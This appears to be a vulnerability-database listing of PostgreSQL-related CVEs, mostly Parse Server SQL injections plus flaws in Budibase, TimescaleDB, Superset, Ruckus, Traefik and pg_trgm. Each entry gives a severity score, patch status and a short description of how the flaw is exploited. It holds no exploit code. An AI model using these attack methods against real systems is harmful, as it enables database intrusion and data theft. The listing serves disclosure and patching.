An attacker with access to the master key can inject malicious SQL via crafted field names used in query constraints when Parse Server is configured with PostgreSQL as the database. The field name in a `$regex` query operator is passed to PostgreSQL using unparameterized string interpolation, allowing the attacker to manipulate the SQL query. While the master key controls what can be done through the Parse Server abstraction layer, this SQL injection bypasses Parse Server entirely and operates at the database level. This vulnerability only affects Parse Server deployments using PostgreSQL. The fix applies proper SQL identifier escaping to field names in the query handler and hardens query field name validation to reject malicious field names for all query types. There is no known workaround.

- GitHub security advisory: https://github.com/parse-community/parse-server/security/advisories/GHSA-c442-97qw-j6c6
- Fix Parse Server 9: https://github.com/parse-community/parse-server/releases/tag/9.6.0-alpha.10
- Fix Parse Server 8: https://github.com/parse-community/parse-server/releases/tag/8.6.36

SQLi PostgreSQL Node.js +1
NVD GitHub VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Parse Server versions prior to 9.6.0-alpha.6 and 8.6.32 allow attackers to bypass class-level permission restrictions on protected fields by using dot-notation in query and sort parameters, enabling enumeration of sensitive field values through binary oracle attacks. This affects both MongoDB and PostgreSQL deployments and requires no authentication or user interaction. No patch is currently available for affected versions.

Authentication Bypass PostgreSQL Node.js +1
NVD GitHub VulDB
EPSS 0% CVSS 9.8
CRITICAL PATCH Act Now

SQL injection in Parse Server before 9.6.0-alpha.5/8.6.31. Third Parse Server SQLi.

SQLi PostgreSQL Node.js +1
NVD GitHub VulDB
EPSS 0% CVSS 9.8
CRITICAL PATCH Act Now

SQL injection in Parse Server before 9.6.0-alpha.5/8.6.31.

SQLi PostgreSQL Node.js +1
NVD GitHub VulDB
EPSS 0% CVSS 9.8
CRITICAL PATCH Act Now

SQL injection in Parse Server before 9.6.0-alpha.2/8.6.28.

SQLi PostgreSQL Node.js +1
NVD GitHub VulDB
EPSS 0%
This Week

CWE-798: Use of Hard-coded Credentials vulnerability exists that could cause information disclosure and remote code execution when SOCKS Proxy is enabled, and administrator credentials and PostgreSQL database credentials are known. SOCKS Proxy is disabled by default.

RCE Information Disclosure PostgreSQL
NVD
EPSS 0% CVSS 7.2
HIGH PATCH This Week

Command injection in Budibase 3.23.22 and earlier allows authenticated attackers with high privileges to execute arbitrary system commands by injecting malicious values into PostgreSQL connection parameters that are unsanitized in shell command construction. An attacker with administrative access can exploit this vulnerability to gain complete control over the underlying server hosting the Budibase instance. No patch is currently available for this vulnerability.

PostgreSQL Command Injection Budibase
NVD GitHub VulDB
EPSS 0% CVSS 9.9
CRITICAL POC PATCH Act Now

SQL injection in WeKnora LLM document understanding framework allows authenticated users to extract arbitrary database contents. CVSS 9.9 with scope change. PoC available.

RCE SQLi PostgreSQL +3
NVD GitHub
EPSS 0% CVSS 8.8
HIGH This Week

Arbitrary code execution in TimescaleDB 2.23.0 through 2.25.1 allows local authenticated users to execute malicious functions by shadowing built-in PostgreSQL functions through user-writable schemas in the search_path setting during extension upgrades. An attacker with database access can create malicious functions in writable schemas that are invoked instead of legitimate PostgreSQL functions, resulting in code execution with database privileges. No patch is currently available for affected installations.

RCE PostgreSQL Red Hat +2
NVD GitHub VulDB
EPSS 0% CVSS 9.8
CRITICAL POC Act Now

SQL injection in Chartbrew before 4.8.3. PoC available.

PostgreSQL MySQL Chartbrew
NVD GitHub
EPSS 0% CVSS 5.7
MEDIUM This Month

Packetbeat's PostgreSQL protocol parser improperly validates array indices, allowing authenticated attackers on the same network to crash the monitoring service by sending malicious packets. An attacker exploiting this denial-of-service vulnerability can terminate the Packetbeat process, disrupting monitoring capabilities on systems with PostgreSQL protocol monitoring enabled. No patch is currently available.

Denial Of Service PostgreSQL Golang +1
NVD
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Authenticated users in Apache Superset versions before 6.0.0 can execute write operations against PostgreSQL databases configured as read-only by crafting specially formatted SQL statements that evade validation checks. This allows an attacker with SQLLab access to perform unauthorized data modifications despite read-only protections being in place. No patch is currently available for affected versions.

Apache PostgreSQL Superset
NVD
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Insufficient SQL function restrictions in Apache Superset before 4.1.2 allow authenticated users to execute sensitive database functions on ClickHouse engines that should have been blocked. An attacker with database access could leverage the incomplete DISALLOWED_SQL_FUNCTIONS list to bypass security controls and potentially extract or manipulate data. No patch is currently available for affected versions of Apache Superset, PostgreSQL, and related deployments.

Apache PostgreSQL Superset
NVD
EPSS 0% CVSS 9.8
CRITICAL Act Now

Hardcoded SSH keys in Ruckus Network Director OVA < 4.5.0.56 for postgres user. Same across all appliances.

Privilege Escalation PostgreSQL
NVD GitHub
EPSS 0% CVSS 9.8
CRITICAL Act Now

Hardcoded PostgreSQL credentials in Ruckus Network Director OVA < 4.5.0.54.

Authentication Bypass PostgreSQL
NVD GitHub
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Denial of service in Traefik versions prior to 3.6.8 allows unauthenticated remote attackers to exhaust connection resources by exploiting improper timeout handling in STARTTLS request processing. An attacker can send a PostgreSQL SSLRequest prelude and then stall the connection indefinitely, bypassing the readTimeout protection and accumulating open connections until service availability is degraded. A patch is available in version 3.6.8.

Denial Of Service PostgreSQL Red Hat +2
NVD GitHub
EPSS 0% CVSS 8.2
HIGH PATCH This Week

Heap buffer overflow in the pg_trgm extension of PostgreSQL 18.0 and 18.1 allows authenticated database users to trigger memory corruption through specially crafted input strings. An attacker with database access could potentially achieve privilege escalation or cause service disruption, though exploit complexity is currently limited by restricted control over written data. No patch is currently available.

Privilege Escalation Buffer Overflow PostgreSQL +2
NVD